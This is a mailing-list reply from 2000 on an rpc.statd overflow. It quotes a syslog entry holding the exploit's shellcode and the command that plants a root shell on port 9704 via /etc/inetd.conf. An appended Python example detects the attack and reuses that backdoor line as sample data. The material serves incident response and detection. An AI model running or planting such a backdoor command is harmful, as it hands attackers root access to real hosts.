Security Incidents mailing list archives

Re: Port 9704


From: Graeme Fowler <graeme.f () WEBFUSION CO UK>
Date: Thu, 12 Oct 2000 09:45:18 +0100

Derek K wrote:
I'm seeing a lot of traffic from 2 mailservers - it's going out on port 9704 and going in on another box's 9704. I'm suspicious, and don't find any references to it around. The 9704->9704 makes me wonder if it isn't a hack of some kind.

Yup. 9704 is the port added to inetd by a pretty well-known overflow for
rpc.statd:

Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff706000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
<90><90
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83>
<8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

...and BONK! they have a rootshell running on 9704.

See http://www.securityfocus.com/bid/1480

I'd let the owners know, pronto. Alternatively if you have any control
over them, get them unplugged.

Regards

Graeme
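Two checks that follow from the reply above, as an added example that is not part of the original thread: first, pick the rpc.statd "SM_MON request for hostname containing '/'" warning out of syslog and recover the inetd line the payload echoes into /etc/inetd.conf; second, walk /etc/inetd.conf itself and flag any service that hands out a shell (the "9704 stream tcp nowait root /bin/sh sh -i" line the post describes). The syslog lines and the inetd.conf below are constructed samples, and the function names and the list of shell paths are assumptions made for this example.

```python
import re

# Constructed sample syslog (not from the post): one benign line, one line
# in the shape of the rpc.statd warning quoted in the thread, one inetd reload.
SAMPLE_SYSLOG = """\
Aug 11 17:12:59 victim sshd[221]: Accepted password for admin from 10.0.0.5
Aug 11 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': \\x90\\x90/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Aug 11 17:13:10 victim inetd[99]: Reading configuration
"""

# Constructed /etc/inetd.conf with the appended backdoor line (assumption: the
# usual 7-field inetd.conf layout, service/type/proto/flags/user/server/args).
SAMPLE_INETD_CONF = """\
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""

STATD_MARKER = "SM_MON request for hostname containing '/'"
# Assumed list of interpreters that never belong in the server_path column.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "/bin/zsh", "sh", "bash"}
APPEND_RE = re.compile(r"echo\s+(.*?)\s*>>\s*/etc/inetd\.conf")


def find_statd_attacks(syslog_text):
    """Return (syslog line number, appended inetd.conf line or None) for every
    rpc.statd message that carries the hostname-with-'/' warning."""
    hits = []
    for n, line in enumerate(syslog_text.splitlines(), 1):
        if "rpc.statd" not in line or STATD_MARKER not in line:
            continue
        m = APPEND_RE.search(line)
        hits.append((n, m.group(1).strip() if m else None))
    return hits


def find_inetd_backdoors(conf_text):
    """Parse inetd.conf and flag entries that spawn a shell, pass 'sh -i',
    or are keyed by a raw port number instead of a /etc/services name."""
    findings = []
    for n, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed entry; inetd would ignore it too
        service, sock_type, proto, flags, user, server = fields[:6]
        args = fields[6:]
        reasons = []
        if server.rsplit("/", 1)[-1] in SHELLS:
            reasons.append("server program is a shell")
        if "-i" in args:
            reasons.append("interactive shell arguments")
        if service.isdigit():
            reasons.append("service given as a bare port number")
        if reasons:
            if user == "root":
                reasons.append("runs as root")
            findings.append({"line": n, "service": service, "proto": proto,
                             "user": user, "server": server, "reasons": reasons})
    return findings


def triage(syslog_text, conf_text):
    """Combine both checks into one report dict for a host."""
    return {"statd_hits": find_statd_attacks(syslog_text),
            "inetd_backdoors": find_inetd_backdoors(conf_text)}


if __name__ == "__main__":
    report = triage(SAMPLE_SYSLOG, SAMPLE_INETD_CONF)
    for n, appended in report["statd_hits"]:
        print(f"syslog line {n}: rpc.statd exploit attempt; appended: {appended!r}")
    for f in report["inetd_backdoors"]:
        print(f"inetd.conf line {f['line']}: {f['service']}/{f['proto']} -> "
              f"{f['server']} as {f['user']} ({', '.join(f['reasons'])})")
```

On a live box the second check is the one to run first: a process already listening on 9704 with /bin/sh as its argv is a compromise regardless of what syslog says, since the payload also HUPs inetd and the log may have been trimmed afterwards.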

